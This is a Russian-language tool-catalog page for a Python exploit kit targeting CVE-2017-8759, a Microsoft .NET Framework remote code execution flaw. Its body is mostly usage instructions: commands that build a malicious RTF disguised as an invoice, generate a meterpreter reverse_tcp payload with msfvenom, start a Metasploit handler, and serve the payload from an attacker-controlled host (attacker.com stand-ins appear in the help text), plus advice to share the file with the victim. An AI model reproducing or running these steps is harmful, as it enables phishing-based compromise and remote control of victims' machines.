Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-8759 — CVE-2017-8759 微软word漏洞利用脚本 | Kitploit
Инструменты/GitHubGitHub/adeljck/cve-2017-8759
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubadeljck/cve-2017-8759

CVE-2017-8759

CVE-2017-8759 微软word漏洞利用脚本

Репозиторий
7 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Инструмент эксплуатации CVE-2017-8759

Инструмент эксплуатации CVE-2017-8759 — это удобный скрипт на Python, который предоставляет пентестерам и исследователям безопасности быстрый и эффективный способ тестирования RCE Microsoft .NET Framework. Он может генерировать вредоносный RTF-файл и доставлять полезную нагрузку metasploit / meterpreter / другую полезную нагрузку жертве без сложной настройки.

Отказ от ответственности

Эта программа предназначена ТОЛЬКО для образовательных целей. Не используйте её без разрешения. Применяется обычный отказ от ответственности, особенно тот факт, что я (bhdresh) не несу ответственности за любой ущерб, причинённый прямым или косвенным использованием информации или функциональности, предоставленной этими программами. Автор или любой интернет-провайдер НЕ несёт ответственности за содержание или неправильное использование этих программ или любых их производных. Используя эту программу, вы принимаете тот факт, что любой ущерб (потеря данных, сбой системы, компрометация системы и т.д.), причинённый использованием этих программ, не является ответственностью bhdresh.

Наконец, это личная разработка, пожалуйста, уважайте её философию и не используйте для плохих целей!

Примечание к выпуску:

В скрипт были добавлены следующие возможности

root@kitploit:~
- Генерация вредоносного RTF-файла
- Режим эксплуатации для сгенерированного RTF-файла

Версия: Python версии 2.7.13

Сценарий: Доставка локальной полезной нагрузки meterpreter

Примеры команд
root@kitploit:~
1) Сгенерировать вредоносный RTF-файл
   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Необязательно, если используется полезная нагрузка MSF): Сгенерировать полезную нагрузку metasploit и запустить обработчик
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Запустить набор инструментов в режиме эксплуатации для доставки локальной полезной нагрузки
   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

Аргументы командной строки:

root@kitploit:~
# python cve-2017-8759_toolkit.py -h

Это удобный набор инструментов для эксплуатации CVE-2017-8759 (Microsoft .NET Framework RCE)

Режимы:

-M gen                                          Только генерация вредоносного файла

     Генерация вредоносного RTF/PPSX-файла:

      -w <Filename.rtf>                   Имя вредоносного RTF-файла (поделитесь этим файлом с жертвой).

      -u <http://attacker.com/test.txt>   Путь к удалённому txt-файлу. Обычно это должен быть домен или IP-адрес, где работает этот инструмент.
                                          Например, http://attackerip.com/test.txt (Этот URL будет включён в вредоносный RTF-файл и будет запрошен, когда жертва откроет вредоносный RTF-файл).

				      
-M exp                                          Запустить режим эксплуатации

     Эксплуатация:
  
      -p <TCP порт: по умолчанию 80>            Номер локального порта.

      -e <http://attacker.com/shell.exe>  Путь к исполняемому файлу / оболочке meterpreter / полезной нагрузке, которую необходимо выполнить на цели.

      -l </tmp/shell.exe>                 Укажите локальный путь к исполняемому файлу / оболочке meterpreter / полезной нагрузке.
Скачать инструмент